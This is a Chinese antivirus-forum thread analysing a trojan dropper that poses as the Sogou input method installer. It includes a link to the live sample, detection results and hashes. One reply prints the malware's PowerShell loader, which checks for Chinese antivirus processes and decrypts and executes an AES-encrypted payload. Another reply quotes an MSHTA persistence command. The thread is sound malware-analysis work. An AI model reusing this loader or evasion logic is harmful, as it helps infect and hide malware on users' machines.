查看: 368|回复: 7
收起左侧

[病毒样本] FakeApp1x(搜狗输入法)

[复制链接]
WGC_ZY
发表于 昨天 17:38 | 显示全部楼层 |阅读模式
本帖最后由 WGC_ZY 于 2026-2-15 17:56 编辑

https://wormhole.app/KB6OPA#QtgkfrVcQoaG14j16R7VNg

VT(8/70): https://www.virustotal.com/gui/f ... 7053f8fd8?nocache=1

实体机的卡巴不断弹出拦截访问恶意网址






本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
莒县小哥
发表于 昨天 17:43 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
成顔
发表于 昨天 18:22 | 显示全部楼层
BEST 过右键,双击后检测到toolsps.exe但不杀,期间疯狂拦截网址。我还要云台终止。(附toolsps.exe命令行
  1. "C:\escsvc\toolsps.exe" if (Get-Process -Name '360Tray','360sd','HipsDaemon','kxetray','QQPCTray','RavMonD','KVMonXP' -ErrorAction SilentlyContinue) { $AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\4.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent } else { Start-Process 'c:\\escsvc\\5.exe';$AES=New-Object System.Security.Cryptography.AesManaged;$AES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AES.KeySize=256;$AES.BlockSize=128;$Salt=[System.Text.Encoding]::UTF8.GetBytes('Salt1234567890123');$DerivedBytes=New-Object System.Security.Cryptography.Rfc2898DeriveBytes('AdminAAA...',$Salt,1000);$AES.Key=$DerivedBytes.GetBytes(32);$AES.IV=$DerivedBytes.GetBytes(16);$Decryptor=$AES.CreateDecryptor();$EncryptedBytes=[Convert]::FromBase64String((Get-Content -Path 'c:\\escsvc\\3.txt' -Raw -Encoding UTF8));$DecryptedBytes=$Decryptor.TransformFinalBlock($EncryptedBytes,0,$EncryptedBytes.Length);$DecryptedContent=[System.Text.Encoding]::UTF8.GetString($DecryptedBytes);Invoke-Expression $DecryptedContent }
复制代码


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
PhozeAMTB
发表于 昨天 19:48 | 显示全部楼层
WD

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Alexander1026
发表于 昨天 19:52 | 显示全部楼层
类型:
HEUR/QVM42.3.6C39.Malware.Gen

描述:
HEUR/QVM42.3.6C39.Malware.Gen

扫描引擎:
360云查杀引擎


文件指纹(MD5):
4e1abcbcdf853cf92ecb3d1cf93d7d84
Rukia
发表于 昨天 22:17 | 显示全部楼层
我印象中这类样本加的自启动方式(如果有的话)是
C:\escsvc\defaultpack.exe /C:"MSHTA C:\escsvc\escsvc.exe"
WGC_ZY
 楼主| 发表于 昨天 22:34 | 显示全部楼层
Rukia 发表于 2026-2-15 22:17
我印象中这类样本加的自启动方式(如果有的话)是
C:\escsvc\defaultpack.exe /C:"MSHTA C:\escsvc\escsvc.e ...

应该和这个差不多:https://www.huorong.cn/document/tech/vir_report/1844
c199529
发表于 3 小时前 | 显示全部楼层
腾讯电脑管家18
ver:20260216

---------------------
2026-2-16 01:27:03 MD5:49f7140a9fd46044b2258a235c84840f
搜狗拼音输入法.exe [Win32.Trojan-Dropper.Agent.Bzlw]


---------------------

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2026-2-16 05:16 , Processed in 0.077931 second(s), 3 queries , Redis On.

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表